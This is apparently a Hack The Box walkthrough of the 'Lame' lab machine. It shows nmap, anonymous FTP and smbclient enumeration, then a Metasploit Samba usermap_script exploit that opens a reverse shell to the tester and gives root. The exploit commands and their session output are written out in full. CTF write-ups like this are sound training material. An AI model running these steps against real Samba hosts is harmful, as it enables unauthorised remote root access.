This is the first box in HTB and it was so easy. You can get root shell from vulnerable smb service.We don't need to escalate to get root shell.
Enumeration
Nmap
# Nmap 7.92 scan initiated Tue Dec 2109:50:522021 as: nmap -sC -sV -oN nmap2.out 10.10.10.3Nmap scan report for lame.htb (10.10.10.3)Host is up (0.31s latency).Not shown:996 filtered tcp ports (no-response)PORTSTATESERVICEVERSION21/tcp open ftp vsftpd 2.3.4|_ftp-anon: Anonymous FTP login allowed (FTP code 230)| ftp-syst:| STAT:|FTP server status:| Connected to 10.10.14.6| Logged inasftp| TYPE:ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| vsFTPd 2.3.4- secure, fast, stable|_End of status22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)| ssh-hostkey:|102460:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)|_ 204856:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)139/tcp open netbios-ssn Samba smbd 3.X- 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_smb2-time: Protocol negotiation failed (SMB2)| smb-security-mode:| account_used: <blank>| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian)| Computer name: lame| NetBIOS computer name: | Domain name: hackthebox.gr| FQDN: lame.hackthebox.gr|_ System time: 2021-12-20T22:30:54-05:00|_clock-skew: mean: 2h39m30s, deviation: 3h32m10s, median: 9m28sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Tue Dec 21 09:52:04 2021 -- 1 IP address (1 host up) scanned in 72.30 seconds
There is four port open and FTP can login with anonymous user.
FTP Anonymous
┌─[sheinn101@parrot]─[~/htb/lame]└──╼ [??]$ ftp 10.10.10.3Connected to 10.10.10.3.220 (vsFTPd 2.3.4)Name (10.10.10.3:sheinn101): anonymous331 Please specify the password.Password:230 Login successful.Remote system typeis UNIX.Using binary mode to transfer files.ftp>
But there is no interesting files.
SMB Enumeration
When we login with anonymous using smbclient, it will show us Samba 3.0.20-Debian
┌─[sheinn101@parrot]─[~/htb/lame]└──╼ [??]$ smbclient -L10.10.10.3Enter WORKGROUP\sheinn101's password: Anonymous login successful Sharename Type Comment-------------------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$IPCIPCService (lame server (Samba 3.0.20-Debian))ADMIN$IPCIPCService (lame server (Samba 3.0.20-Debian))Reconnecting withSMB1 for workgroup listing.Anonymous login successful Server Comment---------------- Workgroup Master----------------WORKGROUPLAME┌─[sheinn101@parrot]─[~/htb/lame]└──╼ [??]$
Let's find exploit for that in metasploit
Getting Root by Metasploit
msf6 > search Samba 3.0.20Matching Modules================ # Name Disclosure Date Rank Check Description---------------------------------------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a modulebynameorindex. Forexampleinfo 0, use 0 oruseexploit/multi/samba/usermap_scriptmsf6 >
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3rhosts =>10.10.10.3msf6 exploit(multi/samba/usermap_script) > set lhost tun0lhost => tun0msf6 exploit(multi/samba/usermap_script) > run[*] Started reverse TCP handler on 10.10.14.6:4444[*] Command shell session 1opened (10.10.14.6:4444->10.10.10.3:32852) at 2021-12-2113:27:48+0630iduid=0(root) gid=0(root)whoamiroot
